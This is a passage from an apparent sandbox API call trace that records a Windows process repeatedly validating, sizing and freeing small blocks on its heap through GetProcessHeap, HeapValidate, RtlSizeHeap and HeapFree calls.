MemoryPointer=0x4b55a8) returned 0x14 [0175.040] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55a8 | out: hHeap=0x4a0000) returned 1 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e58) returned 1 [0175.040] GetProcessHeap () returned 0x4a0000 [0175.040] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e58) returned 0x10 [0175.040] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e58 | out: hHeap=0x4a0000) returned 1 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55c8) returned 1 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b55c8) returned 0x14 [0175.041] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55c8 | out: hHeap=0x4a0000) returned 1 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e70) returned 1 [0175.041] GetProcessHeap () returned 0x4a0000 [0175.041] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e70) returned 0xe [0175.041] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e70 | out: hHeap=0x4a0000) returned 1 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55e8) returned 1 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b55e8) returned 0x14 [0175.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55e8 | out: hHeap=0x4a0000) returned 1 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5608) returned 1 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.042] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5608) returned 0x12 [0175.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5608 | out: hHeap=0x4a0000) returned 1 [0175.042] GetProcessHeap () returned 0x4a0000 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.043] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5628) returned 1 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.043] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5628) returned 0x14 [0175.043] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5628 | out: hHeap=0x4a0000) returned 1 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.043] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e88) returned 1 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.043] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5e88) returned 0xa [0175.043] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5e88 | out: hHeap=0x4a0000) returned 1 [0175.043] GetProcessHeap () returned 0x4a0000 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5648) returned 1 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5648) returned 0x14 [0175.044] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5648 | out: hHeap=0x4a0000) returned 1 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50d8) returned 1 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50d8) returned 0x24 [0175.044] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50d8 | out: hHeap=0x4a0000) returned 1 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.044] GetProcessHeap () returned 0x4a0000 [0175.045] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5668) returned 1 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.045] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5668) returned 0x14 [0175.045] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5668 | out: hHeap=0x4a0000) returned 1 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.045] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5688) returned 1 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.045] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5688) returned 0x12 [0175.045] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5688 | out: hHeap=0x4a0000) returned 1 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.045] GetProcessHeap () returned 0x4a0000 [0175.046] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56a8) returned 1 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.046] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56a8) returned 0x14 [0175.046] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56a8 | out: hHeap=0x4a0000) returned 1 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.046] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56c8) returned 1 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.046] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56c8) returned 0x16 [0175.046] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56c8 | out: hHeap=0x4a0000) returned 1 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.046] GetProcessHeap () returned 0x4a0000 [0175.047] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56e8) returned 1 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.047] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56e8) returned 0x14 [0175.047] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56e8 | out: hHeap=0x4a0000) returned 1 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.047] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fa0) returned 1 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.047] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3fa0) returned 0x1a [0175.047] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fa0 | out: hHeap=0x4a0000) returned 1 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.047] GetProcessHeap () returned 0x4a0000 [0175.052] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5708) returned 1 [0175.052] GetProcessHeap () returned 0x4a0000 [0175.052] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5708) returned 0x14 [0175.052] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5708 | out: hHeap=0x4a0000) returned 1 [0175.052] GetProcessHeap () returned 0x4a0000 [0175.052] GetProcessHeap () returned 0x4a0000 [0175.052] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fc8) returned 1 [0175.052] GetProcessHeap () returned 0x4a0000 [0175.053] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3fc8) returned 0x1a [0175.053] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fc8 | out: hHeap=0x4a0000) returned 1 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.053] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5728) returned 1 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.053] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5728) returned 0x14 [0175.053] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5728 | out: hHeap=0x4a0000) returned 1 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.053] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ea0) returned 1 [0175.053] GetProcessHeap () returned 0x4a0000 [0175.054] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ea0) returned 0xc [0175.054] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ea0 | out: hHeap=0x4a0000) returned 1 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.054] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5748) returned 1 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.054] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5748) returned 0x14 [0175.054] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5748 | out: hHeap=0x4a0000) returned 1 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.054] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5eb8) returned 1 [0175.054] GetProcessHeap () returned 0x4a0000 [0175.055] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5eb8) returned 0xe [0175.055] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5eb8 | out: hHeap=0x4a0000) returned 1 [0175.055] GetProcessHeap () returned 0x4a0000 [0175.055] GetProcessHeap () returned 0x4a0000 [0175.055] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5768) returned 1 [0175.055] GetProcessHeap () returned 0x4a0000 [0175.055] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5768) returned 0x14 [0175.055] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5768 | out: hHeap=0x4a0000) returned 1 [0175.055] GetProcessHeap () returned 0x4a0000 [0175.055] GetProcessHeap () returned 0x4a0000 [0175.055] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5788) returned 1 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5788) returned 0x16 [0175.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5788 | out: hHeap=0x4a0000) returned 1 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57a8) returned 1 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57a8) returned 0x14 [0175.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57a8 | out: hHeap=0x4a0000) returned 1 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] GetProcessHeap () returned 0x4a0000 [0175.056] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff0) returned 1 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.057] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3ff0) returned 0x1a [0175.057] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3ff0 | out: hHeap=0x4a0000) returned 1 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.057] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57c8) returned 1 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.057] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57c8) returned 0x14 [0175.057] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57c8 | out: hHeap=0x4a0000) returned 1 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.057] GetProcessHeap () returned 0x4a0000 [0175.058] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ed0) returned 1 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.058] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ed0) returned 0xc [0175.058] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ed0 | out: hHeap=0x4a0000) returned 1 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.058] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57e8) returned 1 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.058] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b57e8) returned 0x14 [0175.058] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b57e8 | out: hHeap=0x4a0000) returned 1 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.058] GetProcessHeap () returned 0x4a0000 [0175.059] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6270) returned 1 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.059] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6270) returned 0x28 [0175.059] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6270 | out: hHeap=0x4a0000) returned 1 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.059] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5808) returned 1 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.059] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5808) returned 0x14 [0175.059] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5808 | out: hHeap=0x4a0000) returned 1 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.059] GetProcessHeap () returned 0x4a0000 [0175.060] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62a0) returned 1 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.060] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b62a0) returned 0x26 [0175.060] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62a0 | out: hHeap=0x4a0000) returned 1 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.060] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5828) returned 1 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.060] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5828) returned 0x14 [0175.060] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5828 | out: hHeap=0x4a0000) returned 1 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.060] GetProcessHeap () returned 0x4a0000 [0175.061] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62d0) returned 1 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b62d0) returned 0x8 [0175.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62d0 | out: hHeap=0x4a0000) returned 1 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5848) returned 1 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5848) returned 0x14 [0175.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5848 | out: hHeap=0x4a0000) returned 1 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] GetProcessHeap () returned 0x4a0000 [0175.061] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62e0) returned 1 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b62e0) returned 0x22 [0175.062] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b62e0 | out: hHeap=0x4a0000) returned 1 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5868) returned 1 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5868) returned 0x14 [0175.062] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5868 | out: hHeap=0x4a0000) returned 1 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.062] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6310) returned 1 [0175.062] GetProcessHeap () returned 0x4a0000 [0175.063] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6310) returned 0x8 [0175.063] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6310 | out: hHeap=0x4a0000) returned 1 [0175.063] GetProcessHeap () returned 0x4a0000 [0175.063] GetProcessHeap () returned 0x4a0000 [0175.063] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5888) returned 1 [0175.063] GetProcessHeap () returned 0x4a0000 [0175.063] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5888) returned 0x14 [0175.063] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5888 | out: hHeap=0x4a0000) returned 1 [0175.239] GetProcessHeap () returned 0x4a0000 [0175.239] GetProcessHeap () returned 0x4a0000 [0175.240] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ee8) returned 1 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.240] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ee8) returned 0x10 [0175.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ee8 | out: hHeap=0x4a0000) returned 1 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.240] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58a8) returned 1 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.240] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58a8) returned 0x14 [0175.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58a8 | out: hHeap=0x4a0000) returned 1 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.240] GetProcessHeap () returned 0x4a0000 [0175.241] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58c8) returned 1 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.241] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58c8) returned 0x18 [0175.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58c8 | out: hHeap=0x4a0000) returned 1 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.241] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58e8) returned 1 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.241] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b58e8) returned 0x14 [0175.241] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b58e8 | out: hHeap=0x4a0000) returned 1 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.241] GetProcessHeap () returned 0x4a0000 [0175.242] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f00) returned 1 [0175.242] GetProcessHeap () returned 0x4a0000 [0175.242] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f00) returned 0xa [0175.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f00 | out: hHeap=0x4a0000) returned 1 [0175.242] GetProcessHeap () returned 0x4a0000 [0175.242] GetProcessHeap () returned 0x4a0000 [0175.242] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5908) returned 1 [0175.242] GetProcessHeap () returned 0x4a0000 [0175.242] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5908) returned 0x14 [0175.242] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5908 | out: hHeap=0x4a0000) returned 1 [0175.242] GetProcessHeap () returned 0x4a0000 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.243] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5928) returned 1 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.243] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5928) returned 0x16 [0175.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5928 | out: hHeap=0x4a0000) returned 1 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.243] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5948) returned 1 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.243] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5948) returned 0x14 [0175.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5948 | out: hHeap=0x4a0000) returned 1 [0175.243] GetProcessHeap () returned 0x4a0000 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.244] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5968) returned 1 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.244] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5968) returned 0x18 [0175.244] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5968 | out: hHeap=0x4a0000) returned 1 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.244] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5988) returned 1 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.244] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5988) returned 0x14 [0175.244] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5988 | out: hHeap=0x4a0000) returned 1 [0175.244] GetProcessHeap () returned 0x4a0000 [0175.245] GetProcessHeap () returned 0x4a0000 [0175.245] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f18) returned 1 [0175.245] GetProcessHeap () returned 0x4a0000 [0175.245] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f18) returned 0x10 [0175.245] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f18 | out: hHeap=0x4a0000) returned 1 [0175.245] GetProcessHeap () returned 0x4a0000 [0175.245] GetProcessHeap () returned 0x4a0000 [0175.245] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59a8) returned 1 [0175.245] GetProcessHeap () returned 0x4a0000 [0175.245] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59a8) returned 0x14 [0175.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59a8 | out: hHeap=0x4a0000) returned 1 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f30) returned 1 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f30) returned 0xe [0175.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f30 | out: hHeap=0x4a0000) returned 1 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59c8) returned 1 [0175.246] GetProcessHeap () returned 0x4a0000 [0175.246] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59c8) returned 0x14 [0175.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59c8 | out: hHeap=0x4a0000) returned 1 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f48) returned 1 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f48) returned 0xe [0175.247] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f48 | out: hHeap=0x4a0000) returned 1 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59e8) returned 1 [0175.247] GetProcessHeap () returned 0x4a0000 [0175.247] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b59e8) returned 0x14 [0175.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b59e8 | out: hHeap=0x4a0000) returned 1 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f60) returned 1 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f60) returned 0x10 [0175.248] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f60 | out: hHeap=0x4a0000) returned 1 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a08) returned 1 [0175.248] GetProcessHeap () returned 0x4a0000 [0175.248] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a08) returned 0x14 [0175.249] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a08 | out: hHeap=0x4a0000) returned 1 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6320) returned 1 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6320) returned 0x4e [0175.249] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6320 | out: hHeap=0x4a0000) returned 1 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a28) returned 1 [0175.249] GetProcessHeap () returned 0x4a0000 [0175.249] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5a28) returned 0x14 [0175.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5a28 | out: hHeap=0x4a0000) returned 1 